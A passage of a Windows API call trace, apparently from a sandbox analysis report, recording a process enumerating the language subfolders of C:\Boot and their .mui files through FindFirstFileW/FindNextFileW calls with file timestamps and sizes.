ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x2fa0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootres.dll.mui", cAlternateFileName="BOOTRE~1.MUI")) returned 0 [0286.379] FindClose (in: hFindFile=0x3947ca8 | out: hFindFile=0x3947ca8) returned 1 [0286.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0286.379] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0286.379] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0286.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.379] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0286.380] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.380] FindFirstFileW (in: lpFileName="C:\\Boot\\ro-RO\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948328 [0286.380] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.380] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.380] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.380] FindClose (in: hFindFile=0x3948328 | out: hFindFile=0x3948328) returned 1 [0286.380] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.380] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0286.380] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.380] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39481a8 [0286.381] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.381] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.381] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.381] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.381] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0286.381] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.381] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0286.381] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.381] FindFirstFileW (in: lpFileName="C:\\Boot\\sk-SK\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947c28 [0286.382] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.382] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.382] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.382] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0286.382] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.382] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0286.382] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.382] FindFirstFileW (in: lpFileName="C:\\Boot\\sl-SI\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0286.383] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.383] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.383] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.383] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0286.383] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.383] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0286.383] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.383] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-CS\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0286.383] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0x5168548b, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.383] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.384] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.384] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.384] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0286.384] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.384] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0286.384] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.384] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.384] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.384] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.385] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0286.385] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0286.385] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.385] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0286.385] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.385] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0286.385] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01adf43, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6a2250, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.385] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.385] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.386] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.386] FindClose (in: hFindFile=0x3947ea8 | out: hFindFile=0x3947ea8) returned 1 [0286.386] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.386] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0286.386] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.386] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947fe8 [0286.386] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.387] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x385f800 | 